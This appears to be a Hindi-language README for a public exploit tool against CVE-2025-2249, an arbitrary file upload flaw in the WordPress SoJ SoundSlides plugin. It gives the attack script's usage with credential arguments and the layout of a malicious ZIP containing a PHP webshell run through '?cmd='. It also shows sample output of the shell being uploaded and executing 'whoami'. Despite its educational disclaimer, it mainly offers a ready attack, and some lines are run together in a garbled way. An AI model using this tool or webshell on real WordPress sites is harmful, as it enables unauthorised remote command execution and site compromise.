
WordPress SoJ SoundSlides Plugin <= 1.2.2 मनमानी फ़ाइल अपलोड के लिए संवेदनशील है।
⚠️ अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
SoJ SoundSlides प्लगइन योगदानकर्ता या उच्चतर भूमिकाओं वाले प्रमाणित उपयोगकर्ताओं को मनमानी ZIP फ़ाइलें अपलोड करने की अनुमति देता है। मान्यता की कमी के कारण, हमलावर PHP वेबशेल अपलोड कर सकते हैं जो वेब-सुलभ निर्देशिका से निकाली और निष्पादित की जाती हैं।
एक हमलावर जिसके पास वैध WordPress क्रेडेंशियल हैं वह निम्नलिखित कर सकता है:
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| Argument | Description |
|---|---|
-u | WordPress बेस URL |
-un | WordPress उपयोगकर्ता नाम |
-p | WordPress पासवर्ड |
readme.txt से संस्करण जांचnxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
.php फ़ाइलों के लिए wp-content/uploads/ की निगरानी करें❤️ द्वारा निर्मित [Nxploited | Khaled ALenazi]
शिक्षा, जागरूकता और सुरक्षा के लिए।
सुरक्षा सभी की जिम्मेदारी है। हमेशा नैतिक रूप से परीक्षण करें, जिम्मेदारी से रिपोर्ट करें, और वेब की रक्षा करें।